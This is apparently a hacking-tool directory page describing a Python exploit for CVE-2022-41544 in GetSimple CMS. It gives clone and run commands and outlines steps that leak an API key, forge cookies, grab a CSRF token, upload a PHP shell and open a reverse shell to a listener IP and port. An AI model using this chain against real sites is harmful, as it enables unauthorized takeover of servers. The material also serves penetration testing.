Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-41544 — Python exploit script for CVE-2022-41544 in GetSimple CMS. Automates API key leakage, CSRF token extraction, PHP shell upload, and reverse shell trigger for penetration testing. | Kitploit
Tools/GitHubGitHub/h3x0v3rl0rd/cve-2022-41544
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration Testing
GitHubh3x0v3rl0rd/cve-2022-41544

CVE-2022-41544

Python exploit script for CVE-2022-41544 in GetSimple CMS. Automates API key leakage, CSRF token extraction, PHP shell upload, and reverse shell trigger for penetration testing.

View Repository
31 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-41544 Exploit Script

This repository contains a script to exploit CVE-2022-41544 vulnerability in GetSimple CMS. The script performs several steps to check for vulnerabilities, leak API keys, set cookies, obtain CSRF tokens, upload a shell, and trigger the shell.

Changes and Improvements

  1. Deprecation Warning Handling: Removed the deprecated telnetlib import as it was not necessary for the script's functionality.
  2. Enhanced Error Handling: Added more robust error handling for HTTP requests and XML parsing.
  3. Improved User Feedback: Provided detailed feedback for each step to help users understand the script's progress and any issues encountered.
  4. Input Validation: Ensured that the user inputs for the target, path, and credentials are validated.
  5. Documentation and Comments: Added comments and documentation to improve code readability and usability.

Usage

  1. Clone the Repository:

    root@kitploit:~
    git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
    cd CVE-2022-41544
    
  2. Install Dependencies: Ensure you have Python 3 installed along with the requests library.

root@kitploit:~
pip3 install requests
  • Run the Script:

    root@kitploit:~
    python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
    
    • <target>: The target domain or IP address.
    • <path>: The path to the GetSimple CMS installation.
    • <ip:port>: The IP and port for the reverse shell.
    • <username>: The admin username for the GetSimple CMS.

    Example:

    root@kitploit:~
    python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
    
  • image

    image

    Script Overview

    Functions

    • print_the_banner(): Displays a stylized banner using ASCII art.
    • get_version(target, path): Checks if the target version of GetSimple CMS is vulnerable.
    • api_leak(target, path): Attempts to retrieve an API key from an authorization XML file.
    • set_cookies(username, version, apikey): Sets cookies required for further requests based on the retrieved API key.
    • get_csrf_token(target, path, headers): Extracts a CSRF token necessary for uploading a shell.
    • upload_shell(target, path, headers, nonce, shell_content): Uploads a PHP shell to the target server.
    • shell_trigger(target, path): Triggers the uploaded shell to establish a reverse shell connection.

    Main Function

    The main() function orchestrates the entire process by calling the above functions in sequence to exploit the CVE-2022-41544 vulnerability.

    Author

    This script was developed by h3x0v3rl0rd.

    Disclaimer

    This script is provided for educational purposes only. Unauthorized access to systems is illegal and unethical. Use this script responsibly and only on systems you have explicit permission to test.

    License

    This project is licensed under the MIT License - see the LICENSE file for details.

    Download Tool